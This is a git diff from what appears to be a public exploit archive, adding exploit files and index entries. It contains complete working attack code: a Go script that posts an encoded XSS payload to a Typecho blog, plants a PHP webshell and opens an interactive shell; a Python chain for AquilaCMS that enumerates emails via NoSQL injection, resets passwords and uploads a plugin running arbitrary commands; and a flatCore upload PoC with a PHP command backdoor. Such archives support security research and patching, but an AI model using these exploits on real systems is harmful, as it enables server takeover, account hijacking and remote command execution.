+	phpPayload = fmt.Sprintf(phpPayload, password)
+	jsPayload := `
+		var i = document.createElement('iframe');
+		i.src = location.protocol+'//'+location.host+'/admin/theme-editor.php';
+		i.style.display = 'none';
+		document.body.appendChild(i);
+
+		setTimeout(() => {
+			var textarea = i.contentWindow.document.getElementById('content');
+			if (textarea.value.includes(payload))
+				return;
+
+			textarea.value = textarea.value.replace(/<\?php/, '<?php ' + payload);
+
+			var form = i.contentWindow.document.getElementById('theme').submit();
+		}, 200);
+	`
+	return fmt.Sprintf("var payload = `%s`;\n%s", phpPayload, jsPayload)
+}
+
+func generatePayload(jsCode string) string {
+	remainder := len(jsCode) % 3
+	if remainder != 0 {
+		jsCode += strings.Repeat(" ", 3-remainder)
+	}
+	jsCodeEncoded := base64.StdEncoding.EncodeToString([]byte(jsCode))
+	return fmt.Sprintf("[<img style=\"display:none\" src=x onerror=\"eval(atob('%s'))\">][1]\n[1]: https://google.com", jsCodeEncoded)
+}
+
+func createPost(u string, cookies string, payload string) string {
+	formData := url.Values{}
+	formData.Set("title", postTitle)
+	formData.Set("text", payload+"\n"+postText)
+	formData.Set("do", "save")
+	formData.Set("markdown", "1")
+	formData.Set("category%5B%5D", "1")
+	formData.Set("allowComment", "1")
+	formData.Set("allowPing", "1")
+	formData.Set("allowFeed", "1")
+	formData.Set("dst", "60")
+	formData.Set("timezone", "7200")
+
+	req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
+	if err != nil {
+		fmt.Println("[X] Error creating malicious post creation request:", err)
+		return ""
+	}
+
+	req.Header.Set("Cookie", cookies)
+	req.Header.Set("User-Agent", userAgent)
+	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
+	req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
+	req.Header.Set("Referer", strings.Replace(strings.Split(u, ".php")[0], "index", "admin/write-post.php", 1))
+
+	resp, err := client.Do(req)
+	if err != nil {
+		fmt.Println("[X] Error sending malicious post creation request:", err)
+		return ""
+	}
+
+	defer resp.Body.Close()
+	return resp.Header.Get("Location")
+}
+
+func checkInjected(u string) bool {
+	req, err := http.NewRequest("HEAD", u, nil)
+	if err != nil {
+		return false
+	}
+
+	req.Header.Set("User-Agent", userAgent)
+
+	resp, err := client.Do(req)
+	if err != nil {
+		return false
+	}
+
+	return resp.Header.Get("X-Random-Token") != ""
+}
+
+func readInput() string {
+	scanner := bufio.NewScanner(os.Stdin)
+	if scanner.Scan() {
+		return scanner.Text()
+	}
+	return ""
+}
+
+func interactiveShell(u string, password string) {
+	for {
+		fmt.Print("$ ")
+		cmd := readInput()
+
+		formData := url.Values{}
+		formData.Set("CSRFToken", password)
+		formData.Set("action", cmd)
+
+		req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
+		if err != nil {
+			fmt.Println("[X] Error creating shell request:", err)
+			continue
+		}
+
+		req.Header.Set("User-Agent", userAgent)
+		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
+		req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
+
+		resp, err := client.Do(req)
+		if err != nil {
+			fmt.Println("[X] Error sending shell request:", err)
+			continue
+		}
+
+		buf := new(bytes.Buffer)
+		buf.ReadFrom(resp.Body)
+		body := buf.String()
+
+		fmt.Println(body)
+	}
+}
+
+func main() {
+	if len(os.Args) != 3 {
+		fmt.Println("Usage: go run CVE-2024-35540.go <URL> <COOKIE_HEADER_VALUE>")
+		os.Exit(1)
+	}
+
+	fmt.Println("[+] Starting Typecho <= 1.3.0 Stored XSS exploit (CVE-2024-35540) by cyberaz0r")
+
+	targetUrl := os.Args[1]
+	cookies := os.Args[2]
+
+	fmt.Println("[*] Getting post edit URL with CSRF token...")
+	editUrl := getEditUrl(targetUrl, cookies)
+	if editUrl == "" {
+		fmt.Println("[-] Could not get post edit URL, exiting...")
+		return
+	}
+
+	fmt.Println("[+] Edit URL:", editUrl)
+
+	password := generateRandomBytes()
+	fmt.Println("[+] Generated password to access the webshell: ", password)
+
+	fmt.Println("[*] Generating JavaScript code to inject webshell...")
+	jsCode := getJsCode(password)
+	payload := generatePayload(jsCode)
+
+	fmt.Println("[*] Creating malicious post...")
+	postUrl := createPost(editUrl, cookies, payload)
+	if postUrl == "" || postUrl == "/" {
+		fmt.Println("[-] Could not create malicious post, exiting...")
+		return
+	}
+
+	previewUrl := strings.Replace(postUrl, "write-post.php", "preview.php", 1)
+	fmt.Println("[+] Malicious post created successfully!")
+	fmt.Println("[i] Send this preview URL to the admin to trigger the XSS:\n" + previewUrl)
+
+	fmt.Println("[*] Waiting for the admin to visit the preview URL...")
+	for !checkInjected(targetUrl) {
+		time.Sleep(1 * time.Second)
+	}
+
+	fmt.Println("[+] Webshell injected successfully!")
+	fmt.Println("[+] Enjoy your shell ;)\n")
+	interactiveShell(targetUrl, password)
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/52164.py b/exploits/php/webapps/52164.py
new file mode 100755
index 000000000..4ce3ceec5
--- /dev/null
+++ b/exploits/php/webapps/52164.py
@@ -0,0 +1,197 @@
+# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE) (Unauthenticated)
+# Date: 2024-10-25
+# Exploit Author: Eui Chul Chung
+# Vendor Homepage: https://www.aquila-cms.com/
+# Software Link: https://github.com/AquilaCMS/AquilaCMS
+# Version: v1.409.20
+# CVE: CVE-2024-48572, CVE-2024-48573
+
+
+import io
+import json
+import uuid
+import string
+import zipfile
+import argparse
+import requests
+import textwrap
+
+
+def unescape_special_characters(email):
+    return (
+        email.replace("[$]", "$")
+        .replace("[*]", "*")
+        .replace("[+]", "+")
+        .replace("[-]", "-")
+        .replace("[.]", ".")
+        .replace("[?]", "?")
+        .replace(r"[\^]", "^")
+        .replace("[|]", "|")
+    )
+
+
+def get_user_emails():
+    valid_characters = list(
+        string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
+    ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
+
+    emails_found = []
+
+    next_emails = ["^"]
+    while next_emails:
+        prev_emails = next_emails
+        next_emails = []
+
+        for email in prev_emails:
+            found = False
+            for ch in valid_characters:
+                data = {"email": f"{email + ch}.*"}
+                res = requests.put(f"{args.url}/api/v2/user", json=data)
+
+                if json.loads(res.text)["code"] == "UserAlreadyExist":
+                    next_emails.append(email + ch)
+                    found = True
+
+            if not found:
+                emails_found.append(email[1:])
+                print(f"[+] {unescape_special_characters(email[1:])}")
+
+    return emails_found
+
+
+def reset_password(email):
+    data = {"email": email}
+    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
+
+    data = {"token": {"$ne": None}, "password": args.password}
+    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
+
+    print(f"[+] {unescape_special_characters(email)} : {args.password}")
+
+
+def get_admin_auth_token(emails):
+    for email in emails:
+        data = {"username": email, "password": args.password}
+        res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
+
+        if res.status_code == 200:
+            print(f"[+] Administrator account : {unescape_special_characters(email)}")
+            return json.loads(res.text)["data"]
+
+    return None
+
+
+def create_plugin(plugin_name):
+    payload = textwrap.dedent(
+        f"""
+    const {{ exec }} = require("child_process");
+
+    /**
+     * This function is called when the plugin is desactivated or when we delete it
+     */
+    module.exports = async function (resolve, reject) {{
+      try {{
+        exec("{args.command}");
+        return resolve();
+      }} catch (error) {{}}
+    }};
+    """
+    ).strip()
+
+    plugin = io.BytesIO()
+    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
+        zip_file.writestr(
+            f"{plugin_name}/package.json",
+            io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
+        )
+        zip_file.writestr(
+            f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
+        )
+        zip_file.writestr(
+            f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
+        )
+
+    plugin.seek(0)
+    return plugin
+
+
+def rce(emails):
+    auth_token = get_admin_auth_token(emails)
+    if auth_token is None:
+        print("[-] Administrator account not found")
+        return
+
+    print("[+] Create malicious plugin")
+    plugin_name = uuid.uuid4().hex
+    plugin = create_plugin(plugin_name)
+
+    print("[+] Upload plugin")
+    headers = {"Authorization": auth_token}
+    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
+    requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
+
+    print("[+] Find uploaded plugin")
+    headers = {"Authorization": auth_token}
+    data = {"PostBody": {"limit": 0}}
+    res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
+
+    plugin_id = None
+    for data in json.loads(res.text)["datas"]:
+        if data["name"] == plugin_name:
+            plugin_id = data["_id"]
+            print(f"[+] Plugin ID : {plugin_id}")
+            break
+
+    if plugin_id is None:
+        print("[-] Plugin not found")
+        return
+
+    print("[+] Deactivate plugin")
+    headers = {"Authorization": auth_token}
+    data = {"idModule": plugin_id, "active": False}
+    res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
+
+    if res.status_code == 200:
+        print("[+] Command execution succeeded")
+    else:
+        print("[-] Command execution failed")
+
+
+def main():
+    print("[*] Retrieve email addresses")
+    emails = get_user_emails()
+
+    print("\n[*] Reset password")
+    for email in emails:
+        reset_password(email)
+
+    print("\n[*] Perform remote code execution")
+    rce(emails)
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument(
+        "-u",
+        dest="url",
+        help="Site URL (e.g. www.aquila-cms.com)",
+        type=str,
+        required=True,
+    )
+    parser.add_argument(
+        "-p",
+        dest="password",
+        help="Password to use for password reset (e.g. HaXX0r3d!)",
+        type=str,
+        default="HaXX0r3d!",
+    )
+    parser.add_argument(
+        "-c",
+        dest="command",
+        help="Command to execute (e.g. touch /tmp/pwned)",
+        type=str,
+        default="touch /tmp/pwned",
+    )
+    args = parser.parse_args()
+
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52165.txt b/exploits/php/webapps/52165.txt
new file mode 100644
index 000000000..719e094e0
--- /dev/null
+++ b/exploits/php/webapps/52165.txt
@@ -0,0 +1,78 @@
+# Exploit Title: [flatCore Arbitrary .php File Upload via acp/acp.php]
+# Date: [2024-10-26]
+# Exploit Author: [CodeSecLab]
+# Vendor Homepage: [https://github.com/flatCore/flatCore-CMS]
+# Software Link: [https://github.com/flatCore/flatCore-CMS]
+# Version: [1.5.5]
+# Tested on: [Ubuntu Windows]
+# CVE : [CVE-2019-10652]
+PoC：
+1)
+1. Access the flatCore Admin Panel
+URL: http://flatcore/acp/acp.php
+Log in with valid administrative credentials.
+2. Upload a Malicious PHP File
+Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
+3. Intercept and Modify the Upload Request
+Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:
+
+POST /acp/core/files.upload-script.php HTTP/1.1
+Host: flatcore
+Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
+Content-Length: <calculated length>
+Cookie: PHPSESSID=<valid_session_id>
+
+-----------------------------735323031399963166993862150
+Content-Disposition: form-data; name="file"; filename="exploit.php"
+Content-Type: application/octet-stream
+
+<?php
+// Simple PHP backdoor code
+echo "Vulnerable File Upload - PoC";
+system($_GET['cmd']);
+?>
+-----------------------------735323031399963166993862150
+Content-Disposition: form-data; name="upload_destination"
+
+../content/files
+-----------------------------735323031399963166993862150
+Content-Disposition: form-data; name="csrf_token"
+
+<valid_csrf_token>
+-----------------------------735323031399963166993862150
+Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
+4. Verification
+After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
+Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami
+
+PoC
+2)
+# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
+# Target URL: http://flatcore/
+# The attacker must be authenticated as an administrator to exploit this vulnerability
+
+# Step 1: Log in as an administrator and obtain the CSRF token
+# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.
+
+# Step 2: Upload a malicious PHP file using the file upload feature
+
+# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
+echo "<?php phpinfo(); ?>" > shell.php
+
+# Upload the PHP file using cURL
+curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
+    -H "Content-Type: multipart/form-data" \
+    -F "file=@shell.php" \
+    -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
+    -F "upload_destination=../content/files" \
+    -F "file_mode=overwrite" \
+    -b "PHPSESSID=YOUR_SESSION_ID_HERE"
+
+# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID
+
+# Step 3: Access the uploaded malicious PHP file
+echo "Visit the following URL to execute the uploaded PHP file:"
+echo "http://flatcore/content/files/shell.php"
+
+This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
+[Replace Your Domain Name]
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 98e176ee0..0df3b6e22 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10397,6 +10397,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,,
 42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,,
 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info
+52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-10,0,CVE-2024-33896,,,,,
 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
 38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
@@ -11078,6 +11079,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17068,exploits/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",remote,multiple,,2011-03-29,2011-03-29,0,,,,,,
 25191,exploits/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",remote,multiple,,2005-03-07,2013-05-06,1,,,,,,https://www.securityfocus.com/bid/12733/info
 24981,exploits/multiple/remote/24981.txt,"JPegToAvi 1.5 - File List Buffer Overflow",2004-12-15,"James Longstreet",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/11976/info
+52158,exploits/multiple/remote/52158.py,"K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)",2025-04-10,"M. Akil Gündoğan",remote,multiple,,2025-04-10,2025-04-10,0,CVE-2024-36424,,,,,
 11817,exploits/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,remote,multiple,,2010-03-19,,1,,,,,,
 24414,exploits/multiple/remote/24414.txt,"Keene Digital Media Server 1.0.2 - Directory Traversal",2004-08-26,"GulfTech Security",remote,multiple,,2004-08-26,2018-01-05,1,"BID: 11057;GTSA-00044",,,,,http://gulftech.org/advisories/Digital%20Media%20Server%20Arbitrary%20File%20Access/44
 20181,exploits/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 - KDC Spoofing",2000-08-28,"Dug Song",remote,multiple,,2000-08-28,2012-08-05,1,OSVDB-84635,,,,,https://www.securityfocus.com/bid/1616/info
@@ -11794,6 +11796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50601,exploits/multiple/webapps/50601.txt,"Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration",2021-12-16,"Daniel Morales",webapps,multiple,,2021-12-16,2021-12-16,0,CVE-2021-44848,,,,,
 11403,exploits/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - Cross-Site Scripting / Source Code Disclosure",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-62460;CVE-2010-0642;OSVDB-62459;CVE-2010-0641,,,,,
 44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,,2018-03-21,2019-07-25,0,CVE-2018-0114,,,,,https://github.com/zi0Black/POC-CVE-2018-0114/tree/d3bddb421726a9eddbabfd6a1ca58ff4abca93af
+52155,exploits/multiple/webapps/52155.py,"Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover",2025-04-10,"Mohammed Adel",webapps,multiple,,2025-04-10,2025-04-10,0,CVE-2024-20419,,,,,
 37816,exploits/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",webapps,multiple,,2015-08-18,2015-08-18,0,CVE-2014-8008;CVE-2014-6271;OSVDB-126132;OSVDB-126131;OSVDB-117422,,,,,http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
 48975,exploits/multiple/webapps/48975.py,"Citadel WebCit < 926 - Session Hijacking Exploit",2020-10-30,"Simone Quatrini",webapps,multiple,,2020-10-30,2020-10-30,0,,,,,,
 47930,exploits/multiple/webapps/47930.txt,"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal",2020-01-16,"Dhiraj Mishra",webapps,multiple,,2020-01-16,2020-01-16,0,CVE-2019-19781,,,,,
@@ -14228,6 +14231,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10816,exploits/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross-Site Scripting",2009-12-30,indoushka,webapps,php,,2009-12-29,,0,,,,,,
 12567,exploits/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass",2010-05-11,indoushka,webapps,php,,2010-05-10,,0,,,,,,
 8432,exploits/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,webapps,php,,2009-04-13,,1,OSVDB-53691;CVE-2009-1317;OSVDB-53690,,,,,http://crackfor.me/bugtraq/aquacms.v1.1.txt
+52164,exploits/php/webapps/52164.py,"AquilaCMS 1.409.20 - Remote Command Execution (RCE)",2025-04-10,"Eui Chul Chung",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-48573,,,,,
 2931,exploits/php/webapps/2931.txt,"AR Memberscript - 'usercp_menu.php' Remote File Inclusion",2006-12-14,ex0,webapps,php,,2006-12-13,,1,OSVDB-57302;CVE-2006-6590,,,,,
 38015,exploits/php/webapps/38015.txt,"AR Web Content Manager (AWCM) - 'cookie_gen.php' Arbitrary Cookie Generation",2012-11-08,"Sooel Son",webapps,php,,2012-11-08,2017-10-20,1,CVE-2012-2437;OSVDB-87922,,,,,https://www.securityfocus.com/bid/56465/info
 27642,exploits/php/webapps/27642.txt,"AR-Blog 5.2 - 'print.php' Cross-Site Scripting",2006-04-14,ALMOKANN3,webapps,php,,2006-04-14,2013-08-17,1,CVE-2006-1893;OSVDB-24863,,,,,https://www.securityfocus.com/bid/17522/info
@@ -15666,6 +15670,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38339,exploits/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,webapps,php,80,2015-09-28,2015-09-28,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5263.php
 23362,exploits/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,webapps,php,,2012-12-13,2012-12-13,0,CVE-2012-5967;OSVDB-88430,,,,,
 11979,exploits/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - SQL Injection",2010-03-31,"Jonathan Salwan",webapps,php,,2010-03-30,,1,OSVDB-63347;CVE-2010-1301,,,,,
+52156,exploits/php/webapps/52156.py,"Centron 19.04 - Remote Code Execution (RCE)",2025-04-10,"Starry Sky",webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-13024,,,,,
 38074,exploits/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",webapps,php,80,2015-09-02,2015-09-02,0,CVE-2015-6545;OSVDB-126097,,,,http://www.exploit-db.comcerb-7.0.3.tar.gz,https://www.htbridge.com/advisory/HTB23269
 39526,exploits/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,webapps,php,80,2016-03-07,2016-03-10,1,,,,http://www.exploit-db.com/screenshots/idlt40000/kali-20-clean-2016-03-10-19-35-06.png,http://www.exploit-db.comcerb5-5_4_4.zip,
 25803,exploits/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",webapps,php,,2005-06-08,2013-05-29,1,,,,,,https://www.securityfocus.com/bid/13897/info
@@ -16195,6 +16200,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80,2018-05-02,2018-05-02,0,CVE-2018-9302,"Server-Side Request Forgery (SSRF)",,,http://www.exploit-db.comcockpit-0.5.5.tar.gz,
 49390,exploits/php/webapps/49390.txt,"Cockpit CMS 0.6.1 - Remote Code Execution",2021-01-07,"Rafael Resende",webapps,php,,2021-01-07,2021-01-07,0,,,,,,
 3251,exploits/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",webapps,php,,2007-02-01,,1,OSVDB-33095;CVE-2007-0757,,,,,
+52159,exploits/php/webapps/52159.txt,"CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)",2025-04-10,"Raj Nandi",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-7815,,,,,
 3599,exploits/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",webapps,php,,2007-03-27,,1,OSVDB-35423;CVE-2007-1839;OSVDB-35422,,,,,
 3711,exploits/php/webapps/3711.html,"CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion",2007-04-11,"John Martinelli",webapps,php,,2007-04-10,2016-11-14,1,OSVDB-34831;CVE-2007-1996,,,,,
 41550,exploits/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,,2017-03-08,2017-03-08,0,,,,,,
@@ -18583,6 +18589,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17099,exploits/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",webapps,php,,2011-04-01,2011-04-01,1,OSVDB-71472,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_feng_office.html
 35041,exploits/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",webapps,php,,2014-10-23,2014-10-23,0,,,,,,
 35042,exploits/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross-Site Scripting",2014-10-23,"AutoSec Tools",webapps,php,,2014-10-23,2016-11-12,0,,,,,,https://www.securityfocus.com/bid/47049/info
+52154,exploits/php/webapps/52154.NA,"Feng Office 3.11.1.2 - SQL Injection",2025-04-10,"Andrey Stoykov",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-6039,,,,,
 46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,,2019-02-28,2019-03-08,0,CVE-2019-9623,,,,,
 35914,exploits/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",webapps,php,80,2015-01-26,2015-01-26,1,OSVDB-117806;OSVDB-117612;OSVDB-117533;OSVDB-117532;CVE-2015-1374;CVE-2015-1373;CVE-2015-1372;OSVDB-117531;CVE-2015-1371;OSVDB-117530,,,,,
 10552,exploits/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,webapps,php,,2009-12-18,,0,,,,,http://www.exploit-db.comfestos_2_2_1.tar.gz,
@@ -18683,6 +18690,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52054,exploits/php/webapps/52054.txt,"Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)",2024-06-26,tmrswrr,webapps,php,,2024-06-26,2024-06-26,0,,,,,,
 8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54111;CVE-2009-1486,,,,,
 1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php,,2006-01-03,,1,,,,,,
+52165,exploits/php/webapps/52165.txt,"flatCore 1.5.5 - Arbitrary File Upload",2025-04-10,CodeSecLab,webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-10652,,,,,
 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",2021-09-06,"Mason Soroka-Gill",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-39608,,,,http://www.exploit-db.comflatCore-CMS-2.0.7.tar.gz,
 51068,exploits/php/webapps/51068.txt,"FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",2023-03-27,"Sinem Şahin",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
 11515,exploits/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,webapps,php,,2010-02-19,,1,,,,,http://www.exploit-db.com269_flatfile_login.zip,
@@ -25803,6 +25811,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50961,exploits/php/webapps/50961.py,"Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)",2022-06-14,UNICORD,webapps,php,,2022-06-14,2022-06-14,0,CVE-2020-5844,,,,,
 48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,,2020-02-13,2020-02-13,0,CVE-2020-8947,,,,,
 48707,exploits/php/webapps/48707.txt,"PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting",2020-07-26,AppleBois,webapps,php,,2020-07-26,2020-07-26,0,CVE-2020-11749,,,,,
+52157,exploits/php/webapps/52157.py,"PandoraFMS 7.0NG.772 - SQL Injection",2025-04-10,"Osama Yousef",webapps,php,,2025-04-10,2025-04-10,0,CVE-2023-44088,,,,,
 48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,,2020-07-26,2020-12-07,0,,,,,,
 25111,exploits/php/webapps/25111.txt,"PaNews 2.0 - Cross-Site Scripting",2005-02-16,pi3ch,webapps,php,,2005-02-16,2013-05-01,1,,,,,,https://www.securityfocus.com/bid/12576/info
 25145,exploits/php/webapps/25145.txt,"PANews 2.0 - PHP Remote Code Execution",2005-02-21,tjomka,webapps,php,,2005-02-21,2013-05-02,1,,,,,,https://www.securityfocus.com/bid/12611/info
@@ -31464,6 +31473,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 29704,exploits/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1291;OSVDB-33858,,,,,https://www.securityfocus.com/bid/22799/info
 29705,exploits/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - 'register.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1291;OSVDB-33859,,,,,https://www.securityfocus.com/bid/22799/info
 29703,exploits/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php?s' SQL Injection",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1289;OSVDB-35817,,,,,https://www.securityfocus.com/bid/22799/info
